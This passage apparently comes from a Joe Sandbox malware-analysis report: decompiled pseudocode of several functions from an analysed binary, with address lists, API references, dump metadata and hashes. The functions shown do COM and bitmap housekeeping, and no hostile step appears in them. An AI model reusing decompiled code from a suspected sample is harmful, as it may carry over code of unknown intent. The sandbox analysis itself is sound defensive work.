							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x44dfbc, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x44df9c);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x44e0dc);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E00424440(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E0040E418(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E0040C7E4(_t229, _t172 + 4);
						}
						if(E00424440(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E0040B21D(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E0040EF2E(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E00412140(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E0040EE18( *((intOrPtr*)(_t261 + 0x50)));
						E0040C7A1( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E00424440(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E0042319C(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E00409D70(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E004230D7( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E00412FBB(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                              0x0040f503
                                                                              0x0040f50e
                                                                              0x0040f515
                                                                              0x0040f517
                                                                              0x0040f51e
                                                                              0x0040f52c
                                                                              0x0040f52f
                                                                              0x0040f65c
                                                                              0x0040f661
                                                                              0x0040f66f
                                                                              0x0040f673
                                                                              0x0040f674
                                                                              0x0040f679
                                                                              0x0040f67f
                                                                              0x0040f690
                                                                              0x0040f695
                                                                              0x0040f6a4
                                                                              0x0040f6a7
                                                                              0x0040f6aa
                                                                              0x0040f6b1
                                                                              0x0040f6b4
                                                                              0x0040f6bb
                                                                              0x0040f6c0
                                                                              0x0040f6c3
                                                                              0x0040f6d0
                                                                              0x0040f6d7
                                                                              0x0040f6da
                                                                              0x0040f6e1
                                                                              0x0040f6e4
                                                                              0x0040f6f1
                                                                              0x0040f6f5
                                                                              0x0040f714
                                                                              0x0040f71a
                                                                              0x0040f720
                                                                              0x0040f72a
                                                                              0x0040f730
                                                                              0x0040f736
                                                                              0x0040f73f
                                                                              0x0040f744
                                                                              0x0040f74a
                                                                              0x0040f766
                                                                              0x0040f769
                                                                              0x0040f76f
                                                                              0x0040f772
                                                                              0x0040f775
                                                                              0x0040f778
                                                                              0x0040f77e
                                                                              0x00000000
                                                                              0x0040f74c
                                                                              0x0040f74c
                                                                              0x0040f752
                                                                              0x0040f752
                                                                              0x00000000
                                                                              0x0040f6f7
                                                                              0x0040f6f7
                                                                              0x0040f6fd
                                                                              0x0040f700
                                                                              0x0040f700
                                                                              0x0040f6f5
                                                                              0x0040f663
                                                                              0x0040f663
                                                                              0x0040f663
                                                                              0x0040f535
                                                                              0x0040f535
                                                                              0x0040f544
                                                                              0x0040f549
                                                                              0x0040f54f
                                                                              0x0040f555
                                                                              0x0040f55d
                                                                              0x0040f55e
                                                                              0x0040f563
                                                                              0x0040f568
                                                                              0x0040f56a
                                                                              0x0040f570
                                                                              0x0040f571
                                                                              0x0040f576
                                                                              0x0040f57b
                                                                              0x0040f581
                                                                              0x0040f583
                                                                              0x0040f597
                                                                              0x0040f59a
                                                                              0x0040f5a0
                                                                              0x0040f5a0
                                                                              0x0040f5a3
                                                                              0x0040f5a9
                                                                              0x0040f5a9
                                                                              0x0040f5b6
                                                                              0x0040f5c4
                                                                              0x0040f5b8
                                                                              0x0040f5bd
                                                                              0x0040f5bd
                                                                              0x0040f5c6
                                                                              0x0040f5c9
                                                                              0x0040f5cf
                                                                              0x0040f5d2
                                                                              0x0040f5d5
                                                                              0x0040f5d9
                                                                              0x0040f5e0
                                                                              0x0040f5e0
                                                                              0x0040f5ef
                                                                              0x0040f600
                                                                              0x0040f5f1
                                                                              0x0040f5f9
                                                                              0x0040f5f9
                                                                              0x0040f605
                                                                              0x0040f60c
                                                                              0x0040f617
                                                                              0x0040f61d
                                                                              0x0040f620
                                                                              0x0040f626
                                                                              0x0040f62a
                                                                              0x0040f63c
                                                                              0x0040f63f
                                                                              0x0040f64a
                                                                              0x0040f652
                                                                              0x0040f781
                                                                              0x0040f784
                                                                              0x0040f787
                                                                              0x0040f789
                                                                              0x0040f78b
                                                                              0x0040f78d
                                                                              0x0040f793
                                                                              0x0040f798
                                                                              0x0040f79b
                                                                              0x0040f7a8
                                                                              0x0040f79d
                                                                              0x0040f7a1
                                                                              0x0040f7a1
                                                                              0x0040f7aa
                                                                              0x0040f7b1
                                                                              0x0040f7b4
                                                                              0x0040f7bb
                                                                              0x0040f7be
                                                                              0x0040f78b
                                                                              0x0040f7c3
                                                                              0x0040f7cb
                                                                              0x0040f7d0
                                                                              0x0040f7d7
                                                                              0x0040f7d8
                                                                              0x0040f7e1
                                                                              0x0040f7e4
                                                                              0x0040f7ec
                                                                              0x0040f7ee
                                                                              0x0040f7f3
                                                                              0x0040f7f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040f7fd
                                                                              0x0040f80a
                                                                              0x0040f818
                                                                              0x0040f81e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040f7fa
                                                                              0x0040f820
                                                                              0x0040f822
                                                                              0x0040f827
                                                                              0x0040f82b
                                                                              0x0040f831
                                                                              0x0040f831
                                                                              0x0040f834
                                                                              0x0040f837
                                                                              0x0040f837
                                                                              0x0040f83a
                                                                              0x00000000
                                                                              0x0040f7e9
                                                                              0x00000000
                                                                              0x0040f83a
                                                                              0x0040f7ec
                                                                              0x0040f83c
                                                                              0x0040f842
                                                                              0x0040f842
                                                                              0x0040f848
                                                                              0x0040f848
                                                                              0x0040f848
                                                                              0x0040f54f
                                                                              0x0040f853
                                                                              0x0040f864

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040F503
                                                                              • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040F62A
                                                                              • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040F842
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Task$AllocFreeH_prolog
                                                                              • String ID:
                                                                              • API String ID: 1522537378-3916222277
                                                                              • Opcode ID: aa5b8d3ee7528c7365d01c3f65cbf4f394906ad53a11e007f37402f9cc77751e
                                                                              • Instruction ID: e283423e67acad890aa5bd1119533e628477d43c1b64eccf915fd59176b95e8f
                                                                              • Opcode Fuzzy Hash: aa5b8d3ee7528c7365d01c3f65cbf4f394906ad53a11e007f37402f9cc77751e
                                                                              • Instruction Fuzzy Hash: 98C10970A00604DFDB24DFA9C884AAEB7F5BF88708F20457EE406E7691DB79A945CF14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040CAA4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E0040CAA4(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E004128A0(E0043112B, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x44debc);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E0041162C(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x44ac98)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x44ac9c);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x44df0c);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}











                                                                              0x0040caa9
                                                                              0x0040cab6
                                                                              0x0040cab8
                                                                              0x0040cabb
                                                                              0x0040cabe
                                                                              0x0040cac3
                                                                              0x0040cac8
                                                                              0x0040cac9
                                                                              0x0040cad0
                                                                              0x0040cadc
                                                                              0x0040cae5
                                                                              0x0040caee
                                                                              0x0040caf6
                                                                              0x0040cafd
                                                                              0x0040cb00
                                                                              0x0040cb03
                                                                              0x0040cb06
                                                                              0x0040cb09
                                                                              0x0040cb11
                                                                              0x0040cb14
                                                                              0x0040cb17
                                                                              0x0040cb1a
                                                                              0x0040cb1d
                                                                              0x0040cb2f
                                                                              0x0040cb39
                                                                              0x0040cb44
                                                                              0x0040cb44
                                                                              0x0040cb47
                                                                              0x0040cb4b
                                                                              0x0040cb5f
                                                                              0x0040cb71
                                                                              0x0040cb79
                                                                              0x0040cb8b
                                                                              0x0040cb93
                                                                              0x0040cba6
                                                                              0x0040cbae
                                                                              0x0040cbc0
                                                                              0x0040cbc8
                                                                              0x0040cbce
                                                                              0x0040cbd6
                                                                              0x0040cbd7
                                                                              0x0040cbdc
                                                                              0x0040cbe2
                                                                              0x0040cbe4
                                                                              0x0040cbe4
                                                                              0x0040cbe7
                                                                              0x0040cbed
                                                                              0x0040cbf1
                                                                              0x0040cbf2
                                                                              0x0040cbfb
                                                                              0x0040cc01
                                                                              0x0040cc06
                                                                              0x0040cc0c
                                                                              0x0040cc12
                                                                              0x0040cc15
                                                                              0x0040cc15
                                                                              0x0040cc1c
                                                                              0x0040cc22
                                                                              0x0040cc25
                                                                              0x0040cc2a
                                                                              0x0040cc2f
                                                                              0x0040cc2f
                                                                              0x0040cc36
                                                                              0x0040cc36
                                                                              0x0040cc44
                                                                              0x0040cc4c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariant
                                                                              • String ID: @$@
                                                                              • API String ID: 1166855276-149943524
                                                                              • Opcode ID: d7a6b9cd2f239eb04d16a9397a3c4d23724b72bb5a0530ab5ecbfc62ed6d2f15
                                                                              • Instruction ID: 6fc71d41aac9ba4043267bb30301733352689564136a8006ddb90503d104dfff
                                                                              • Opcode Fuzzy Hash: d7a6b9cd2f239eb04d16a9397a3c4d23724b72bb5a0530ab5ecbfc62ed6d2f15
                                                                              • Instruction Fuzzy Hash: 3E51B5B1A002199FDB04CFA9C8849EEBBF9FF48304F14456EE506EB250E774A945CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407453, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E00407453() {
				void* _t35;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;
				void* _t45;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t85;
				void* _t90;

				E004128A0(E00430B1A, _t90);
				E004063E4(E0040669E(0x458420));
				_t64 = E0040669E(0x458420);
				_t35 = E004062E3(_t34);
				if(_t35 == 0) {
					_t85 = __imp__#9;
					do {
						 *((short*)(_t90 - 0x28)) = 8;
						 *((intOrPtr*)(_t90 - 0x20)) = E0041FCB0(_t64, "FirstName");
						 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
						_t39 = E00406A15(E0040669E(0x458420), _t90 - 0x18);
						 *(_t90 - 4) = 1;
						_t41 = E004069CF(E0040669E(_t39), _t90 - 0x14, _t90 - 0x28);
						 *(_t90 - 4) = 2;
						_push(E0040626B(E0040669E(_t41), _t90 - 0x38));
						 *(_t90 - 4) = 3;
						_t44 = E00407269(_t90 - 0x10);
						_t76 =  *_t44;
						 *(_t90 - 4) = 4;
						if( *_t44 == 0) {
							_t45 = 0;
						} else {
							_t45 = E004060FD(_t76);
						}
						E00406644( *((intOrPtr*)(_t90 + 8)), _t45);
						_t78 =  *(_t90 - 0x10);
						if( *(_t90 - 0x10) != 0) {
							E004069A2(_t78);
							 *(_t90 - 0x10) =  *(_t90 - 0x10) & 0x00000000;
						}
						_push(_t90 - 0x38);
						 *(_t90 - 4) = 2;
						if( *_t85() < 0) {
							E0041FC30(_t48);
						}
						_t49 =  *((intOrPtr*)(_t90 - 0x14));
						 *(_t90 - 4) = 1;
						if(_t49 != 0) {
							 *((intOrPtr*)( *_t49 + 8))(_t49);
						}
						_t50 =  *((intOrPtr*)(_t90 - 0x18));
						 *(_t90 - 4) = 0;
						if(_t50 != 0) {
							 *((intOrPtr*)( *_t50 + 8))(_t50);
						}
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						_push(_t90 - 0x28);
						if( *_t85() < 0) {
							E0041FC30(_t52);
						}
						E0040639C(E0040669E(0x458420));
						_t64 = E0040669E(0x458420);
						_t35 = E004062E3(_t55);
					} while (_t35 == 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t35;
			}












                                                                              0x00407458
                                                                              0x0040746f
                                                                              0x0040747b
                                                                              0x0040747d
                                                                              0x00407485
                                                                              0x0040748c
                                                                              0x00407492
                                                                              0x00407497
                                                                              0x004074a2
                                                                              0x004074a5
                                                                              0x004074b6
                                                                              0x004074c5
                                                                              0x004074d0
                                                                              0x004074db
                                                                              0x004074eb
                                                                              0x004074ef
                                                                              0x004074f3
                                                                              0x004074f8
                                                                              0x004074fc
                                                                              0x00407500
                                                                              0x00407509
                                                                              0x00407502
                                                                              0x00407502
                                                                              0x00407502
                                                                              0x0040750f
                                                                              0x00407514
                                                                              0x00407519
                                                                              0x0040751b
                                                                              0x00407520
                                                                              0x00407520
                                                                              0x00407527
                                                                              0x00407528
                                                                              0x00407530
                                                                              0x00407533
                                                                              0x00407533
                                                                              0x00407538
                                                                              0x0040753d
                                                                              0x00407541
                                                                              0x00407546
                                                                              0x00407546
                                                                              0x00407549
                                                                              0x0040754e
                                                                              0x00407552
                                                                              0x00407557
                                                                              0x00407557
                                                                              0x0040755a
                                                                              0x00407561
                                                                              0x00407566
                                                                              0x00407569
                                                                              0x00407569
                                                                              0x00407577
                                                                              0x00407583
                                                                              0x00407585
                                                                              0x0040758a
                                                                              0x00407593
                                                                              0x00407598
                                                                              0x004075a0

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407458
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040626B: VariantInit.OLEAUT32(?), ref: 0040627C
                                                                                • Part of subcall function 00407269: __EH_prolog.LIBCMT ref: 0040726E
                                                                              • VariantClear.OLEAUT32(?), ref: 0040752C
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407562
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearH_prolog$ByteCharInitMultiWidelstrlen
                                                                              • String ID: FirstName
                                                                              • API String ID: 3181333722-2707629045
                                                                              • Opcode ID: 6fb0c1d3faa66efec5098600f0f34553dc5c398980d83c924bc962ee77c85e0d
                                                                              • Instruction ID: 22f998c9cbba617c28ef7d94ed856b703e2d021c0dbe949c4917130d903b6a6d
                                                                              • Opcode Fuzzy Hash: 6fb0c1d3faa66efec5098600f0f34553dc5c398980d83c924bc962ee77c85e0d
                                                                              • Instruction Fuzzy Hash: CF315271A042449BCF08FBF584657EE77A95F44308F04447EA406F72C2DF3DAA55876A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042CD1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0042CD1A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t24;
				unsigned int _t25;
				int _t31;
				signed int _t38;
				struct HBITMAP__* _t40;
				int _t43;
				int _t45;
				void* _t48;
				signed int* _t52;
				signed int _t57;
				signed int _t61;
				void* _t62;
				void* _t64;
				void* _t66;

				_t48 = __edx;
				_t64 = _t66 - 0x78;
				_t24 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t64 + 0x74)) = _t24;
				_t25 = GetMenuCheckMarkDimensions();
				_t43 = _t25;
				_t45 = _t25 >> 0x10;
				 *(_t64 - 0x18) = _t45;
				if(_t43 > 0x20) {
					_t43 = 0x20;
				}
				_t4 = _t43 - 4; // 0x1c
				asm("cdq");
				_t5 = _t43 + 0xf; // 0x2f
				_t61 = _t5 >> 4;
				_t57 = (_t4 - _t48 >> 1) + (_t61 << 4) - _t43;
				if(_t57 > 0xc) {
					_t57 = 0xc;
				}
				_t31 = 0x20;
				if(_t45 > _t31) {
					 *(_t64 - 0x18) = _t31;
				}
				E00412140(_t64 - 0xc, 0xff, 0x80);
				_t52 = _t64 + ( *(_t64 - 0x18) - 6 >> 1) * _t61 * 2 - 0xc;
				 *(_t64 - 0x10) = 0x449478;
				_t62 = _t61 + _t61;
				 *((intOrPtr*)(_t64 - 0x14)) = 5;
				do {
					 *(_t64 - 0x10) =  &(( *(_t64 - 0x10))[1]);
					_t38 =  !(( *( *(_t64 - 0x10)) & 0x000000ff) << _t57);
					 *_t52 = _t38;
					_t52[0] = _t38;
					_t52 = _t52 + _t62;
					_t19 = _t64 - 0x14;
					 *_t19 =  *((intOrPtr*)(_t64 - 0x14)) - 1;
				} while ( *_t19 != 0);
				_t40 = CreateBitmap(_t43,  *(_t64 - 0x18), 1, 1, _t64 - 0xc);
				 *0x45a360 = _t40;
				if(_t40 == 0) {
					 *0x45a360 = _t40;
				}
				return E00412FBB(_t40,  *((intOrPtr*)(_t64 + 0x74)));
			}

















                                                                              0x0042cd1a
                                                                              0x0042cd1b
                                                                              0x0042cd25
                                                                              0x0042cd2d
                                                                              0x0042cd30
                                                                              0x0042cd36
                                                                              0x0042cd3f
                                                                              0x0042cd42
                                                                              0x0042cd45
                                                                              0x0042cd49
                                                                              0x0042cd49
                                                                              0x0042cd4a
                                                                              0x0042cd4d
                                                                              0x0042cd50
                                                                              0x0042cd53
                                                                              0x0042cd61
                                                                              0x0042cd66
                                                                              0x0042cd6a
                                                                              0x0042cd6a
                                                                              0x0042cd6d
                                                                              0x0042cd70
                                                                              0x0042cd72
                                                                              0x0042cd72
                                                                              0x0042cd83
                                                                              0x0042cd96
                                                                              0x0042cd9a
                                                                              0x0042cda1
                                                                              0x0042cda3
                                                                              0x0042cdaa
                                                                              0x0042cdb5
                                                                              0x0042cdb8
                                                                              0x0042cdba
                                                                              0x0042cdbc
                                                                              0x0042cdbf
                                                                              0x0042cdc1
                                                                              0x0042cdc1
                                                                              0x0042cdc1
                                                                              0x0042cdd2
                                                                              0x0042cddc
                                                                              0x0042cde2
                                                                              0x0042cdf0
                                                                              0x0042cdf0
                                                                              0x0042ce01

                                                                              APIs
                                                                              • GetMenuCheckMarkDimensions.USER32 ref: 0042CD30
                                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042CDD2
                                                                              • LoadBitmapA.USER32 ref: 0042CDEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
